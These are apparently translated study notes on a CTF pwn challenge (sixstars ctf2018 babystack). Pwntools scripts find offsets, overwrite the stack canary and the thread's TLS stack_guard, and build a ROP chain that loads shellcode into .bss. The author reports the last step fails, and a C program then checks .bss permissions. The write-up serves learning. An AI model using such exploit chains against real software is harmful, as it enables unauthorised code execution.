[Original] PWN study notes [canary bypass exercise] [sixstars ctf2018_babystack]
2022-5-30 18:05 7927
Principle [a stack overflow in a child thread can reach and overwrite stack_guard]
First, measure the offsets from the child thread's buffer to the canary and to stack_guard
#!/usr/local/bin/python3
from pwn import *

# Break at readn and send a cyclic pattern so the offsets to the canary and
# to the thread's TLS stack_guard can be read off the crash in gdb
sh = gdb.debug('./a.out', "b *readn")
sh.sendlineafter(b"send?\n", str(0x2000).encode("utf-8"))
payload = cyclic(0x2000)   # renamed: the original shadowed the builtin str()
sh.send(payload[:0x1000])
sh.send(payload[0x1000:])
sh.interactive()
Result:
stack_guard:6120
canary:4104
Construct the PoC
#!/usr/local/bin/python3
from pwn import *

sh = gdb.debug('./a.out', "b *readn")
sh.sendlineafter(b"send?\n", str(6136).encode("utf-8"))
# 4104 bytes reach the canary, 8 bytes overwrite it, 2008 more bytes reach
# stack_guard at offset 6120, which is overwritten with the same 8 bytes
payload = b'A'*4104 + b'BBBBCCCC' + b'A'*2008 + b'BBBBCCCCDDDDEEEE'
sh.send(payload[:0x1000])
sh.send(payload[0x1000:])
sh.interactive()
Canary bypassed successfully:
Exploit idea:
read(0, bss, ?) reads the shellcode into the .bss segment
then jump to .bss to run the shellcode and get a reverse shell
Note: on newer Kali [Linux kali 5.16.0-kali7-amd64] and Ubuntu 20.04, the .bss segment has no execute permission? This question is still open.
The gadgets for setting arguments only cover rdi and rsi; there is none for rdx
Construct the exploit
#!/usr/local/bin/python3
from pwn import *

context.log_level = 'debug'
context(arch='amd64', os='linux')   # required so shellcraft.sh() assembles for x86-64
sh = gdb.debug('./a.out', "b *readn")
elf = ELF('./a.out')
read_plt = elf.plt['read']
sh.sendlineafter(b"send?\n", str(6136).encode("utf-8"))
shellcode = asm(shellcraft.sh())
print(len(shellcode))
pop_rdi = 0x0000000000400c03      # pop rdi ; ret
pop_rsi_r15 = 0x0000000000400c01  # pop rsi ; pop r15 ; ret
bss_start = 0x602010
payload = b'A'*4104 + b'BBBBCCCC' + b'A'*8                      # up to canary, canary, saved rbp
payload += p64(pop_rdi) + p64(0)                                # rdi = 0 (stdin)
payload += p64(pop_rsi_r15) + p64(bss_start) + p64(0xdeadbeef)  # rsi = bss_start, r15 = junk
payload += p64(read_plt)                                        # read(0, bss_start, ?)
payload += p64(bss_start)                                       # return into bss_start()
payload += cyclic(1944) + b'BBBBCCCCDDDDEEEE'                   # pad to stack_guard and overwrite it
print("strlen %d" % len(payload))
sh.send(payload[:0x1000])
sh.send(payload[0x1000:])
sh.send(shellcode)
sh.interactive()
.bss has no execute permission....
I'm stuck here; I'll pick it up again once I've learned more.
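The .bss question raised above can be settled with two checks on the binary and on the running process. The C program below is an added example, not code from the original post: it parses its own PT_GNU_STACK program header to see whether an executable stack was requested, and reads the permissions of the mapping that holds its .bss from /proc/self/maps (Linux x86-64 and a /proc filesystem are assumed).

```c
/* Added example (not from the original post): does this binary request an
 * executable stack, and is the mapping holding its .bss actually executable? */
#include <elf.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static char bss_probe[64];   /* uninitialised global, so it lives in .bss */

/* Returns 1 if PT_GNU_STACK carries PF_X, 0 if it does not, -1 if the
 * file cannot be read as ELF64 or has no PT_GNU_STACK header. */
int gnu_stack_executable(const char *path) {
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    Elf64_Ehdr eh;
    int result = -1;
    if (fread(&eh, sizeof eh, 1, f) == 1 && memcmp(eh.e_ident, ELFMAG, SELFMAG) == 0) {
        for (int i = 0; i < eh.e_phnum; i++) {
            Elf64_Phdr ph;
            if (fseek(f, (long)(eh.e_phoff + (uint64_t)i * eh.e_phentsize), SEEK_SET) != 0 ||
                fread(&ph, sizeof ph, 1, f) != 1)
                break;
            if (ph.p_type == PT_GNU_STACK) { result = (ph.p_flags & PF_X) ? 1 : 0; break; }
        }
    }
    fclose(f);
    return result;
}

/* Copies the "rwxp" field of the /proc/self/maps line covering addr into
 * out (at least 5 bytes). Returns 1 when a covering mapping was found. */
int mapping_perms(const void *addr, char *out) {
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f) return 0;
    char line[512], perms[5];
    unsigned long lo, hi;
    uintptr_t a = (uintptr_t)addr;
    int found = 0;
    while (fgets(line, sizeof line, f)) {
        if (sscanf(line, "%lx-%lx %4s", &lo, &hi, perms) != 3) continue;
        if (a >= lo && a < hi) { memcpy(out, perms, 5); found = 1; break; }
    }
    fclose(f);
    return found;
}

int main(void) {
    char perms[5] = "????";
    printf("PT_GNU_STACK executable: %d\n", gnu_stack_executable("/proc/self/exe"));
    if (mapping_perms(bss_probe, perms)) printf(".bss mapping perms: %s\n", perms);
    return 0;
}
```

Since Linux 5.8, x86-64 no longer sets READ_IMPLIES_EXEC for binaries with an executable stack, so an executable-stack request no longer turns every readable mapping (including .bss) executable; on a recent kernel the second line therefore prints rw-p even for a binary linked with execstack.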